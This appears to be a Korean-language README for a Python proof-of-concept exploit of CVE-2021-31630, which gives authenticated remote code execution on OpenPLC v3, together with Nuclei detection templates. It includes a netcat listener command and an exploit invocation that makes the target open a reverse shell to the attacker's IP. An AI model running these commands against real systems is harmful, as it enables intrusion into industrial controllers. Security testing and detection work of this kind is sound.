
CVE-2021-31630에 대한 Python 3.13+ 개념 증명 익스플로잇, 악성 하드웨어 레이어 업로드를 통해 OpenPLC v3에서 인증된 원격 코드 실행을 가능하게 합니다. 기본 자격 증명 및 취약점 확인을 위한 Nuclei 탐지 템플릿을 포함합니다.
이것은 OpenPLC v3의 취약점 CVE-2021-31630에 대한 최신 Python 3.13+ 호환 개념 증명 익스플로잇입니다. 이 취약점은 인증된 사용자가 악성 코드가 포함된 사용자 정의 하드웨어 레이어를 업로드할 수 있게 하여 호스트에서 원격 코드 실행(RCE)을 유발합니다.
원본 취약점 발견 및 권고 자료는 Fellipe Oliveira가 제공했습니다. 이 재구현 및 최신화는 httpx, CLI 도구, 로깅 및 보다 안전한 탐지 기술을 사용합니다.
nc -lvnp 9001
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
선택적 플래그:
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
두 번째 템플릿은 로그인한 후 무해한 페이로드 업로드 및 컴파일을 시도하여 실제 코드 실행을 유발하지 않고 취약성을 확인합니다.
이 코드는 교육 및 공인된 보안 테스트 목적으로만 사용해야 합니다. 시스템 소유자의 명시적 허가 없이 사용하지 마십시오.